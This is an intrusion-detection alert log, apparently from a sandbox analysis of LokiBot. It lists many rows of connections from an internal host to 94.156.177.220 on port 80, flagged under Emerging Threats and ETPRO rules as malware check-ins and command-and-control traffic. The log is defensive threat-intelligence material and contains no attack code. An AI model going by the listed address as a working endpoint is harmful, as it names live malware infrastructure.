2024-10-27T08:51:07.969091+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49998	94.156.177.220	80	TCP
2024-10-27T08:51:09.108310+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50005	94.156.177.220	80	TCP
2024-10-27T08:51:10.281408+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50015	94.156.177.220	80	TCP
2024-10-27T08:51:11.421296+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50019	94.156.177.220	80	TCP
2024-10-27T08:51:12.576722+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.220	80	TCP
2024-10-27T08:51:13.725956+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50028	94.156.177.220	80	TCP
2024-10-27T08:51:14.886637+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50029	94.156.177.220	80	TCP
2024-10-27T08:51:16.035982+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50030	94.156.177.220	80	TCP
2024-10-27T08:51:18.145683+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50031	94.156.177.220	80	TCP
2024-10-27T08:51:19.308400+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50032	94.156.177.220	80	TCP
2024-10-27T08:51:20.460366+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50033	94.156.177.220	80	TCP
2024-10-27T08:51:21.617533+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50034	94.156.177.220	80	TCP
2024-10-27T08:51:22.748835+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50035	94.156.177.220	80	TCP
2024-10-27T08:51:23.872533+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50036	94.156.177.220	80	TCP
2024-10-27T08:51:25.027152+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.220	80	TCP
2024-10-27T08:51:26.181621+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50038	94.156.177.220	80	TCP
2024-10-27T08:51:27.344814+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50039	94.156.177.220	80	TCP
2024-10-27T08:51:28.479199+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50040	94.156.177.220	80	TCP
2024-10-27T08:51:29.603188+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50041	94.156.177.220	80	TCP
2024-10-27T08:51:30.871101+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50042	94.156.177.220	80	TCP
2024-10-27T08:51:32.013513+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.220	80	TCP
2024-10-27T08:51:33.157667+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.220	80	TCP
2024-10-27T08:51:34.329371+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.220	80	TCP
2024-10-27T08:51:35.462045+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.220	80	TCP
2024-10-27T08:51:36.719219+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.220	80	TCP
2024-10-27T08:51:37.950107+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.220	80	TCP
2024-10-27T08:51:39.128508+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.220	80	TCP
2024-10-27T08:51:40.256100+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.220	80	TCP
2024-10-27T08:51:41.380145+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.220	80	TCP
2024-10-27T08:51:42.532682+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.220	80	TCP
2024-10-27T08:51:43.667954+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.220	80	TCP
2024-10-27T08:51:44.793693+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.220	80	TCP
2024-10-27T08:51:46.014878+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.220	80	TCP
2024-10-27T08:51:47.142826+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.220	80	TCP
2024-10-27T08:51:48.595470+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.220	80	TCP
2024-10-27T08:51:49.779117+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50058	94.156.177.220	80	TCP
2024-10-27T08:51:50.937949+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50059	94.156.177.220	80	TCP
2024-10-27T08:51:52.086390+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50060	94.156.177.220	80	TCP
2024-10-27T08:51:53.279747+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50061	94.156.177.220	80	TCP
2024-10-27T08:51:54.432804+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50062	94.156.177.220	80	TCP
2024-10-27T08:51:55.643652+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50063	94.156.177.220	80	TCP
2024-10-27T08:51:56.780487+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50064	94.156.177.220	80	TCP
2024-10-27T08:51:58.233352+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50065	94.156.177.220	80	TCP
2024-10-27T08:51:59.409762+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50066	94.156.177.220	80	TCP
2024-10-27T08:52:00.558856+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50067	94.156.177.220	80	TCP
2024-10-27T08:52:01.715149+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50068	94.156.177.220	80	TCP
2024-10-27T08:52:03.098066+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50069	94.156.177.220	80	TCP
2024-10-27T08:52:04.229607+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50070	94.156.177.220	80	TCP
2024-10-27T08:52:06.200494+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50071	94.156.177.220	80	TCP
2024-10-27T08:52:07.344016+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50072	94.156.177.220	80	TCP
2024-10-27T08:52:08.623892+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50073	94.156.177.220	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T08:50:12.874031+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49704	94.156.177.220	80	TCP
2024-10-27T08:50:14.054015+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49705	94.156.177.220	80	TCP
2024-10-27T08:50:15.099444+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49706	94.156.177.220	80	TCP
2024-10-27T08:50:16.345385+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49707	94.156.177.220	80	TCP
2024-10-27T08:50:17.481650+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49708	94.156.177.220	80	TCP
2024-10-27T08:50:18.620575+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49711	94.156.177.220	80	TCP
2024-10-27T08:50:19.733946+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49714	94.156.177.220	80	TCP
2024-10-27T08:50:20.863635+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49718	94.156.177.220	80	TCP
2024-10-27T08:50:21.978873+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49720	94.156.177.220	80	TCP
2024-10-27T08:50:23.111641+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49726	94.156.177.220	80	TCP
2024-10-27T08:50:24.282179+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49732	94.156.177.220	80	TCP
2024-10-27T08:50:25.410505+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49742	94.156.177.220	80	TCP
2024-10-27T08:50:26.527265+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49749	94.156.177.220	80	TCP
2024-10-27T08:50:27.675772+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49755	94.156.177.220	80	TCP
2024-10-27T08:50:28.825870+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49761	94.156.177.220	80	TCP
2024-10-27T08:50:29.955586+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49771	94.156.177.220	80	TCP
2024-10-27T08:50:31.270533+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49778	94.156.177.220	80	TCP
2024-10-27T08:50:32.403234+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49784	94.156.177.220	80	TCP
2024-10-27T08:50:33.667352+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49792	94.156.177.220	80	TCP
2024-10-27T08:50:34.995763+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49798	94.156.177.220	80	TCP
2024-10-27T08:50:36.124868+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49809	94.156.177.220	80	TCP
2024-10-27T08:50:37.232324+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49815	94.156.177.220	80	TCP
2024-10-27T08:50:38.362776+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49821	94.156.177.220	80	TCP
2024-10-27T08:50:39.488975+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49829	94.156.177.220	80	TCP
2024-10-27T08:50:40.630175+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49838	94.156.177.220	80	TCP
2024-10-27T08:50:41.777546+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49844	94.156.177.220	80	TCP
2024-10-27T08:50:43.921773+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49850	94.156.177.220	80	TCP
2024-10-27T08:50:45.046731+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49861	94.156.177.220	80	TCP
2024-10-27T08:50:46.191642+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49867	94.156.177.220	80	TCP
2024-10-27T08:50:47.330074+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49873	94.156.177.220	80	TCP
2024-10-27T08:50:48.455794+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49882	94.156.177.220	80	TCP
2024-10-27T08:50:49.612677+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49889	94.156.177.220	80	TCP
2024-10-27T08:50:50.713925+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49895	94.156.177.220	80	TCP
2024-10-27T08:50:51.825406+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49901	94.156.177.220	80	TCP
2024-10-27T08:50:52.946537+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49912	94.156.177.220	80	TCP
2024-10-27T08:50:54.062937+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49918	94.156.177.220	80	TCP
2024-10-27T08:50:55.183722+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49924	94.156.177.220	80	TCP
2024-10-27T08:50:56.307813+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49931	94.156.177.220	80	TCP
2024-10-27T08:50:57.446376+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49940	94.156.177.220	80	TCP
2024-10-27T08:50:58.580399+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49947	94.156.177.220	80	TCP
2024-10-27T08:50:59.707698+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49953	94.156.177.220	80	TCP
2024-10-27T08:51:01.137133+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49964	94.156.177.220	80	TCP
2024-10-27T08:51:02.266873+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49970	94.156.177.220	80	TCP
2024-10-27T08:51:03.602216+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49976	94.156.177.220	80	TCP
2024-10-27T08:51:04.727181+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49982	94.156.177.220	80	TCP
2024-10-27T08:51:05.865657+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49992	94.156.177.220	80	TCP
2024-10-27T08:51:06.994667+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49998	94.156.177.220	80	TCP
2024-10-27T08:51:08.135076+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50005	94.156.177.220	80	TCP
2024-10-27T08:51:09.286646+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50015	94.156.177.220	80	TCP
2024-10-27T08:51:10.443346+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50019	94.156.177.220	80	TCP
2024-10-27T08:51:11.588271+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50027	94.156.177.220	80	TCP
2024-10-27T08:51:12.760458+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50028	94.156.177.220	80	TCP
2024-10-27T08:51:13.933889+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50029	94.156.177.220	80	TCP
2024-10-27T08:51:15.074619+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50030	94.156.177.220	80	TCP
2024-10-27T08:51:17.193763+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50031	94.156.177.220	80	TCP
2024-10-27T08:51:18.323356+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50032	94.156.177.220	80	TCP
2024-10-27T08:51:19.490866+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50033	94.156.177.220	80	TCP
2024-10-27T08:51:20.662609+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50034	94.156.177.220	80	TCP
2024-10-27T08:51:21.790345+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50035	94.156.177.220	80	TCP
2024-10-27T08:51:22.926086+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50036	94.156.177.220	80	TCP
2024-10-27T08:51:24.055966+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50037	94.156.177.220	80	TCP
2024-10-27T08:51:25.206621+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50038	94.156.177.220	80	TCP
2024-10-27T08:51:26.372207+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50039	94.156.177.220	80	TCP
2024-10-27T08:51:27.522769+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50040	94.156.177.220	80	TCP
2024-10-27T08:51:28.649111+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50041	94.156.177.220	80	TCP
2024-10-27T08:51:29.900539+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50042	94.156.177.220	80	TCP
2024-10-27T08:51:31.042666+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50043	94.156.177.220	80	TCP
2024-10-27T08:51:32.200989+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50044	94.156.177.220	80	TCP
2024-10-27T08:51:33.352982+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50045	94.156.177.220	80	TCP
2024-10-27T08:51:34.500867+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50046	94.156.177.220	80	TCP
2024-10-27T08:51:35.646903+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50047	94.156.177.220	80	TCP
2024-10-27T08:51:36.996360+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50048	94.156.177.220	80	TCP
2024-10-27T08:51:38.141525+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50049	94.156.177.220	80	TCP
2024-10-27T08:51:39.303118+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50050	94.156.177.220	80	TCP
2024-10-27T08:51:40.420434+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50051	94.156.177.220	80	TCP
2024-10-27T08:51:41.538598+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50052	94.156.177.220	80	TCP
2024-10-27T08:51:42.700130+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50053	94.156.177.220	80	TCP
2024-10-27T08:51:43.837038+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50054	94.156.177.220	80	TCP
2024-10-27T08:51:45.061399+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50055	94.156.177.220	80	TCP
2024-10-27T08:51:46.189175+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50056	94.156.177.220	80	TCP
2024-10-27T08:51:47.637134+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50057	94.156.177.220	80	TCP
2024-10-27T08:51:48.773539+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50058	94.156.177.220	80	TCP
2024-10-27T08:51:49.971106+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50059	94.156.177.220	80	TCP
2024-10-27T08:51:51.110434+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50060	94.156.177.220	80	TCP
2024-10-27T08:51:52.277798+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50061	94.156.177.220	80	TCP
2024-10-27T08:51:53.448342+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50062	94.156.177.220	80	TCP
2024-10-27T08:51:54.657779+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50063	94.156.177.220	80	TCP
2024-10-27T08:51:55.818063+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50064	94.156.177.220	80	TCP
2024-10-27T08:51:57.259902+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50065	94.156.177.220	80	TCP
2024-10-27T08:51:58.416005+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50066	94.156.177.220	80	TCP
2024-10-27T08:51:59.584177+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50067	94.156.177.220	80	TCP
2024-10-27T08:52:00.744111+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50068	94.156.177.220	80	TCP
2024-10-27T08:52:02.147704+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50069	94.156.177.220	80	TCP
2024-10-27T08:52:03.273450+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50070	94.156.177.220	80	TCP
2024-10-27T08:52:05.224737+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50071	94.156.177.220	80	TCP
2024-10-27T08:52:06.371984+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50072	94.156.177.220	80	TCP
2024-10-27T08:52:07.611756+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50073	94.156.177.220	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T08:50:12.874031+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49704	94.156.177.220	80	TCP
2024-10-27T08:50:14.054015+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49705	94.156.177.220	80	TCP
2024-10-27T08:50:15.099444+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49706	94.156.177.220	80	TCP
2024-10-27T08:50:16.345385+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49707	94.156.177.220	80	TCP
2024-10-27T08:50:17.481650+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49708	94.156.177.220	80	TCP
2024-10-27T08:50:18.620575+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49711	94.156.177.220	80	TCP
2024-10-27T08:50:19.733946+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49714	94.156.177.220	80	TCP
2024-10-27T08:50:20.863635+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49718	94.156.177.220	80	TCP
2024-10-27T08:50:21.978873+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49720	94.156.177.220	80	TCP
2024-10-27T08:50:23.111641+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49726	94.156.177.220	80	TCP
2024-10-27T08:50:24.282179+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49732	94.156.177.220	80	TCP
2024-10-27T08:50:25.410505+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49742	94.156.177.220	80	TCP
2024-10-27T08:50:26.527265+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49749	94.156.177.220	80	TCP
2024-10-27T08:50:27.675772+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49755	94.156.177.220	80	TCP
2024-10-27T08:50:28.825870+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49761	94.156.177.220	80	TCP
2024-10-27T08:50:29.955586+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.220	80	TCP
2024-10-27T08:50:31.270533+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49778	94.156.177.220	80	TCP
2024-10-27T08:50:32.403234+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49784	94.156.177.220	80	TCP
2024-10-27T08:50:33.667352+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49792	94.156.177.220	80	TCP
2024-10-27T08:50:34.995763+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49798	94.156.177.220	80	TCP
2024-10-27T08:50:36.124868+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49809	94.156.177.220	80	TCP
2024-10-27T08:50:37.232324+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49815	94.156.177.220	80	TCP
2024-10-27T08:50:38.362776+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49821	94.156.177.220	80	TCP
2024-10-27T08:50:39.488975+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49829	94.156.177.220	80	TCP
2024-10-27T08:50:40.630175+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49838	94.156.177.220	80	TCP
2024-10-27T08:50:41.777546+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49844	94.156.177.220	80	TCP
2024-10-27T08:50:43.921773+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49850	94.156.177.220	80	TCP
2024-10-27T08:50:45.046731+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49861	94.156.177.220	80	TCP
2024-10-27T08:50:46.191642+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49867	94.156.177.220	80	TCP
2024-10-27T08:50:47.330074+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49873	94.156.177.220	80	TCP
2024-10-27T08:50:48.455794+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49882	94.156.177.220	80	TCP
2024-10-27T08:50:49.612677+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49889	94.156.177.220	80	TCP
2024-10-27T08:50:50.713925+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49895	94.156.177.220	80	TCP
2024-10-27T08:50:51.825406+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49901	94.156.177.220	80	TCP
2024-10-27T08:50:52.946537+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49912	94.156.177.220	80	TCP
2024-10-27T08:50:54.062937+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49918	94.156.177.220	80	TCP
2024-10-27T08:50:55.183722+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49924	94.156.177.220	80	TCP
2024-10-27T08:50:56.307813+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49931	94.156.177.220	80	TCP
2024-10-27T08:50:57.446376+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49940	94.156.177.220	80	TCP
2024-10-27T08:50:58.580399+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49947	94.156.177.220	80	TCP
2024-10-27T08:50:59.707698+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49953	94.156.177.220	80	TCP
2024-10-27T08:51:01.137133+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49964	94.156.177.220	80	TCP
2024-10-27T08:51:02.266873+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49970	94.156.177.220	80	TCP
2024-10-27T08:51:03.602216+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49976	94.156.177.220	80	TCP
2024-10-27T08:51:04.727181+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49982	94.156.177.220	80	TCP
2024-10-27T08:51:05.865657+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49992	94.156.177.220	80	TCP
2024-10-27T08:51:06.994667+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49998	94.156.177.220	80	TCP
2024-10-27T08:51:08.135076+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50005	94.156.177.220	80	TCP
2024-10-27T08:51:09.286646+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50015	94.156.177.220	80	TCP
2024-10-27T08:51:10.443346+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50019	94.156.177.220	80	TCP
2024-10-27T08:51:11.588271+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.220	80	TCP
2024-10-27T08:51:12.760458+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50028	94.156.177.220	80	TCP
2024-10-27T08:51:13.933889+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50029	94.156.177.220	80	TCP
2024-10-27T08:51:15.074619+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50030	94.156.177.220	80	TCP
2024-10-27T08:51:17.193763+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50031	94.156.177.220	80	TCP
2024-10-27T08:51:18.323356+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50032	94.156.177.220	80	TCP
2024-10-27T08:51:19.490866+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50033	94.156.177.220	80	TCP
2024-10-27T08:51:20.662609+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50034	94.156.177.220	80	TCP
2024-10-27T08:51:21.790345+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50035	94.156.177.220	80	TCP
2024-10-27T08:51:22.926086+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50036	94.156.177.220	80	TCP
2024-10-27T08:51:24.055966+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.220	80	TCP
2024-10-27T08:51:25.206621+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50038	94.156.177.220	80	TCP
2024-10-27T08:51:26.372207+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50039	94.156.177.220	80	TCP
2024-10-27T08:51:27.522769+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50040	94.156.177.220	80	TCP
2024-10-27T08:51:28.649111+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50041	94.156.177.220	80	TCP
2024-10-27T08:51:29.900539+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50042	94.156.177.220	80	TCP
2024-10-27T08:51:31.042666+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.220	80	TCP
2024-10-27T08:51:32.200989+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.220	80	TCP
2024-10-27T08:51:33.352982+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.220	80	TCP
2024-10-27T08:51:34.500867+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.220	80	TCP
2024-10-27T08:51:35.646903+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.220	80	TCP
2024-10-27T08:51:36.996360+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.220	80	TCP
2024-10-27T08:51:38.141525+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.220	80	TCP
2024-10-27T08:51:39.303118+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.220	80	TCP
2024-10-27T08:51:40.420434+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.220	80	TCP
2024-10-27T08:51:41.538598+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.220	80	TCP
2024-10-27T08:51:42.700130+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.220	80	TCP
2024-10-27T08:51:43.837038+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.220	80	TCP
2024-10-27T08:51:45.061399+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.220	80	TCP
2024-10-27T08:51:46.189175+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.220	80	TCP
2024-10-27T08:51:47.637134+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.220	80	TCP
2024-10-27T08:51:48.773539+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50058	94.156.177.220	80	TCP
2024-10-27T08:51:49.971106+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50059	94.156.177.220	80	TCP
2024-10-27T08:51:51.110434+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50060	94.156.177.220	80	TCP
2024-10-27T08:51:52.277798+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50061	94.156.177.220	80	TCP
2024-10-27T08:51:53.448342+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50062	94.156.177.220	80	TCP
